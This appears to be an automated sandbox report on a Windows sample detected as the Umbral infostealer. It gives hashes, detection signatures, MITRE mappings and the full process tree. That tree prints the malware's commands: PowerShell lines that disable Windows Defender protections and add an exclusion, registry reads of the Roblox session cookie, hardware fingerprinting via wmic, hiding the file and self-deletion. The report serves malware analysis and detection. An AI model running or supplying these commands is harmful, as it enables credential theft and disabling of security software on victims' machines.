Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-10-2024 20:54
Behavioral task
behavioral1
Sample
test.exe
Resource
win7-20240903-en
General
-
Target
test.exe
-
Size
227KB
-
MD5
7132f3f19b959294d470c06af357e192
-
SHA1
feb85b0836d9a52af2648174e4f53268ca20a309
-
SHA256
aa59ece71acd81ec09202b22af8e1a9d5664412d9bc99c9aa8ea1522467cc128
-
SHA512
b2dc88639c96e83a7138c361f43b52bdd62aa17af347fe46b1c007752c6c3e745e3188c6d8e89e4fcf68a506135eb94e9afa190a9b06acbd6304cc3d37ef2491
-
SSDEEP
6144:eloZM9rIkd8g+EtXHkv/iD40tVZQWRJ66vSgR1EsUcb8e1myi:IoZOL+EP80tVZQWRJ66vSgR1Eu8
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2256-1-0x0000000000D50000-0x0000000000D90000-memory.dmp family_umbral -
pid Process 2716 powershell.exe 2764 powershell.exe 2000 powershell.exe 2108 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts test.exe -
Deletes itself 1 IoCs
pid Process 2244 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2244 cmd.exe 2196 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3024 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2196 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2108 powershell.exe 2716 powershell.exe 2764 powershell.exe 2608 powershell.exe 2000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2256 test.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeIncreaseQuotaPrivilege 2296 wmic.exe Token: SeSecurityPrivilege 2296 wmic.exe Token: SeTakeOwnershipPrivilege 2296 wmic.exe Token: SeLoadDriverPrivilege 2296 wmic.exe Token: SeSystemProfilePrivilege 2296 wmic.exe Token: SeSystemtimePrivilege 2296 wmic.exe Token: SeProfSingleProcessPrivilege 2296 wmic.exe Token: SeIncBasePriorityPrivilege 2296 wmic.exe Token: SeCreatePagefilePrivilege 2296 wmic.exe Token: SeBackupPrivilege 2296 wmic.exe Token: SeRestorePrivilege 2296 wmic.exe Token: SeShutdownPrivilege 2296 wmic.exe Token: SeDebugPrivilege 2296 wmic.exe Token: SeSystemEnvironmentPrivilege 2296 wmic.exe Token: SeRemoteShutdownPrivilege 2296 wmic.exe Token: SeUndockPrivilege 2296 wmic.exe Token: SeManageVolumePrivilege 2296 wmic.exe Token: 33 2296 wmic.exe Token: 34 2296 wmic.exe Token: 35 2296 wmic.exe Token: SeIncreaseQuotaPrivilege 2296 wmic.exe Token: SeSecurityPrivilege 2296 wmic.exe Token: SeTakeOwnershipPrivilege 2296 wmic.exe Token: SeLoadDriverPrivilege 2296 wmic.exe Token: SeSystemProfilePrivilege 2296 wmic.exe Token: SeSystemtimePrivilege 2296 wmic.exe Token: SeProfSingleProcessPrivilege 2296 wmic.exe Token: SeIncBasePriorityPrivilege 2296 wmic.exe Token: SeCreatePagefilePrivilege 2296 wmic.exe Token: SeBackupPrivilege 2296 wmic.exe Token: SeRestorePrivilege 2296 wmic.exe Token: SeShutdownPrivilege 2296 wmic.exe Token: SeDebugPrivilege 2296 wmic.exe Token: SeSystemEnvironmentPrivilege 2296 wmic.exe Token: SeRemoteShutdownPrivilege 2296 wmic.exe Token: SeUndockPrivilege 2296 wmic.exe Token: SeManageVolumePrivilege 2296 wmic.exe Token: 33 2296 wmic.exe Token: 34 2296 wmic.exe Token: 35 2296 wmic.exe Token: SeIncreaseQuotaPrivilege 2084 wmic.exe Token: SeSecurityPrivilege 2084 wmic.exe Token: SeTakeOwnershipPrivilege 2084 wmic.exe Token: SeLoadDriverPrivilege 2084 wmic.exe Token: SeSystemProfilePrivilege 2084 wmic.exe Token: SeSystemtimePrivilege 2084 wmic.exe Token: SeProfSingleProcessPrivilege 2084 wmic.exe Token: SeIncBasePriorityPrivilege 2084 wmic.exe Token: SeCreatePagefilePrivilege 2084 wmic.exe Token: SeBackupPrivilege 2084 wmic.exe Token: SeRestorePrivilege 2084 wmic.exe Token: SeShutdownPrivilege 2084 wmic.exe Token: SeDebugPrivilege 2084 wmic.exe Token: SeSystemEnvironmentPrivilege 2084 wmic.exe Token: SeRemoteShutdownPrivilege 2084 wmic.exe Token: SeUndockPrivilege 2084 wmic.exe Token: SeManageVolumePrivilege 2084 wmic.exe Token: 33 2084 wmic.exe Token: 34 2084 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2640 2256 test.exe 31 PID 2256 wrote to memory of 2640 2256 test.exe 31 PID 2256 wrote to memory of 2640 2256 test.exe 31 PID 2256 wrote to memory of 2108 2256 test.exe 33 PID 2256 wrote to memory of 2108 2256 test.exe 33 PID 2256 wrote to memory of 2108 2256 test.exe 33 PID 2256 wrote to memory of 2716 2256 test.exe 35 PID 2256 wrote to memory of 2716 2256 test.exe 35 PID 2256 wrote to memory of 2716 2256 test.exe 35 PID 2256 wrote to memory of 2764 2256 test.exe 37 PID 2256 wrote to memory of 2764 2256 test.exe 37 PID 2256 wrote to memory of 2764 2256 test.exe 37 PID 2256 wrote to memory of 2608 2256 test.exe 39 PID 2256 wrote to memory of 2608 2256 test.exe 39 PID 2256 wrote to memory of 2608 2256 test.exe 39 PID 2256 wrote to memory of 2296 2256 test.exe 41 PID 2256 wrote to memory of 2296 2256 test.exe 41 PID 2256 wrote to memory of 2296 2256 test.exe 41 PID 2256 wrote to memory of 2084 2256 test.exe 44 PID 2256 wrote to memory of 2084 2256 test.exe 44 PID 2256 wrote to memory of 2084 2256 test.exe 44 PID 2256 wrote to memory of 1704 2256 test.exe 46 PID 2256 wrote to memory of 1704 2256 test.exe 46 PID 2256 wrote to memory of 1704 2256 test.exe 46 PID 2256 wrote to memory of 2000 2256 test.exe 48 PID 2256 wrote to memory of 2000 2256 test.exe 48 PID 2256 wrote to memory of 2000 2256 test.exe 48 PID 2256 wrote to memory of 3024 2256 test.exe 50 PID 2256 wrote to memory of 3024 2256 test.exe 50 PID 2256 wrote to memory of 3024 2256 test.exe 50 PID 2256 wrote to memory of 2244 2256 test.exe 52 PID 2256 wrote to memory of 2244 2256 test.exe 52 PID 2256 wrote to memory of 2244 2256 test.exe 52 PID 2244 wrote to memory of 2196 2244 cmd.exe 54 PID 2244 wrote to memory of 2196 2244 cmd.exe 54 PID 2244 wrote to memory of 2196 2244 cmd.exe 54 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2640 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Views/modifies file attributes
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\test.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3024
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\test.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2196
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59d317062d193b2e26942cedf619a5a6f
SHA1347f25adaa494e64840975c5c052b9fb7453ab07
SHA256d9ee5225d765d5b328821b71468efb37172b71ec858f9723b008e168c73f0a73
SHA51244600da8350195046ad7dc71c8c8c8540cd2871cbe41245a173feab544ecc421316ebad04e0ab9ee62a5f58153a02682f46096a00cfdd66fffcd93b5b14d42bc